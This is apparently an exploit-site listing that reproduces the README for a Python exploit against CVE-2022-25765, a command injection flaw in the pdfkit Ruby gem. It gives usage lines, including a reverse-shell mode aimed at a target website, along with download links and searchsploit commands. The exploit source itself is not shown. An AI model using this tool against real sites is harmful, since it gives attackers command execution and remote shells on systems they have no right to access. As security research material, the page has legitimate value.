Exploit for CVE-2022-25765

Name: Exploit for CVE-2022-25765
Rating: 5 (183 reviews)
2023-02-10 | CVSS 7.5
## https://sploitus.com/exploit?id=87EB95BA-F287-5A34-944C-400C152156E5
# Exploit for CVE-2022–25765 (pdfkit) - Command Injection

![GitHub CVE Cover](https://user-images.githubusercontent.com/23003787/219503380-083bd0fc-80e0-4d99-8f38-06c065aaa2d0.png)

**Like this repo? Give us a ⭐!**

*For educational and authorized security research purposes only.*

## Exploit Author

[@UNICORDev](https://unicord.dev) by ([@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))

## Vulnerability Description

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

## Exploit Description

A ruby gem `pdfkit` is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates executable URLs or sends them to a vulnerable website running `pdfkit`.

## Usage

```bash
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h
```

## Options

```
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.
```

## Download

[Download exploit-CVE-2022-25765.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2022-25765/main/exploit-CVE-2022-25765.py)

[Download exploit-CVE-2022-25765.py from ExploitDB](https://www.exploit-db.com/exploits/51293)

### Searchsploit (ExploitDB)

```bash
searchsploit -u
searchsploit -m 51293
```

## Exploit Requirements

- python3
- python3:requests
- python3:urllib3

## Demo

### Custom Command Mode

![cropped command](https://user-images.githubusercontent.com/23003787/221307314-3af99159-2768-4195-b51b-8279cc436a35.gif)

### Reverse Shell Sent to Target Website Mode

![exploit-CVE-2022–25765](https://user-images.githubusercontent.com/23003787/221304847-8d5cafaa-246a-432c-9301-f21271f6d607.gif)

## Tested On

pdfkit Version 0.8.6

## Applies To

pdfkit Versions < 0.8.7.2

## Test Environment

```bash
gem install pdfkit -v 0.8.6
```

## Credits

- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795